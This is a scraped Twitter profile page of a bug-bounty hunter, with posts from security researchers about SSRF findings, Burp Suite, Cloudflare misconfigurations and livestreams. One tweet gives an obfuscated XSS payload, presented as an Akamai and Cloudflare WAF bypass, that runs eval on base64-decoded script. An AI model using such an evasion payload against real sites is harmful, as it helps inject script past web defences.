Mohammad rasool (@mrg2000)'s Twitter Profile

Mohammad rasool
@mrg2000

🕵️ Bug Hunter in Training 🪲 | Web Security Enthusiast 💻 | Code Breaker🧑‍💻🧩

ID: 1264201253904683008

Joined: 23-05-2020 14:27:38

213 Tweets

488 Followers

1,1K Following

nader abdi (@ataturk1925):

Enhance your #BugBounty toolkit with: 1. Integrating comprehensive API unit tests to ensure endpoint reliability 2. Validating request/response DTOs for seamless data contracts 3. Employing Tree-sitter for precise JavaScript parsing and AST analysis

nader abdi (@ataturk1925):

JS files are important, but without understanding the web app architecture, they’re not enough. Instead of just hunting javascript, focus on the architecture. I’m not a hunter, just a suggestion! #bugbountytips #bugbountytip Poria 😏

Poria (@p__oria):

It was a good month 🧑🏻‍🦼 7 more of them are still on the way 🧑🏻‍🦼 nader abdi 😘❤️❤️❤️ @AliHz1337 😘❤️ Mohammad rasool 😘❤️

nader abdi (@ataturk1925):

One of the main challenges in team collaboration with Burp Suite is the lack of data synchronization between members. The idea we have is to sync the site map, save Repeater logs, and show teammates' activities to improve teamwork. Gareth Heyes

nader abdi (@ataturk1925):

Misconfigurations in Cloudflare Zero Trust policies are more common than you think! Out of 1000 tested sites, more than 50 were vulnerable due to improper policy configurations. Check your settings before attackers do! #Cloudflare #ZeroTrust #Security

Matin Arjo (@skycer_00):

I’ve just shared a new write-up! A small curiosity turned into a full-blown SSRF — internal access, exposed data, and deep exploration. Read it here: medium.com/@skycer_00/ful… #BugBounty

Gospel.C (@40sp3l):

SSRF → Internal IP Leak ( 80% it could be it ) Yesterday, after reporting an SSRF vulnerability to Cloudflare, I decided to revisit it to see if I could chain it into something more impactful. Nothing worked, until I started digging into the HTTP callback behavior.

Radman (@iarvy0x):

I just found a WAF bypass for Akamai and Cloudflare: <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>

nader abdi (@ataturk1925):

Back in the game after a long break 🎯 Even without finding a bug, discovering a hidden and undocumented endpoint feels rewarding. You don’t always need an exploit — sometimes the hunt itself is the real win. Poria 😘😘😘

Poria (@p__oria):

Today I received the gift sent by Google VRP. Thank you so much for the beautiful hoodies you sent me. Google VRP (Google Bug Hunters) & Google ❤️❤️ nader abdi ❤️😘❤️😘❤️ #BugBounty

Poria (@p__oria):

I’d rather not say anything about the picture below — it’s better if you see it yourself🤌🏻🤌🏻 nader abdi 😘😘😘😘😘🫂

nader abdi (@ataturk1925):

We're going to hold an event where we share with you our experiences of hunting on Meta (Facebook, Instagram, ...), the technologies Meta uses, and the tools that have been developed! The live stream is next week; we'll post the exact time on the channel itself. 📺 We have three live sessions with Poria ❤️, in the form of

nader abdi (@ataturk1925):

The first part of the live stream is set for Wednesday, 21 Aban, at 8 PM. The topics for parts 1 and 2 are also set 🙏

nader abdi (@ataturk1925):

Tonight's live stream starts at 8. Those who haven't joined yet can join the Discord: discord.gg/gRgv3MBBv6

nader abdi (@ataturk1925):

The second part of the live stream is set for Friday at 8 PM. Be there, we have a lot to discuss about automation.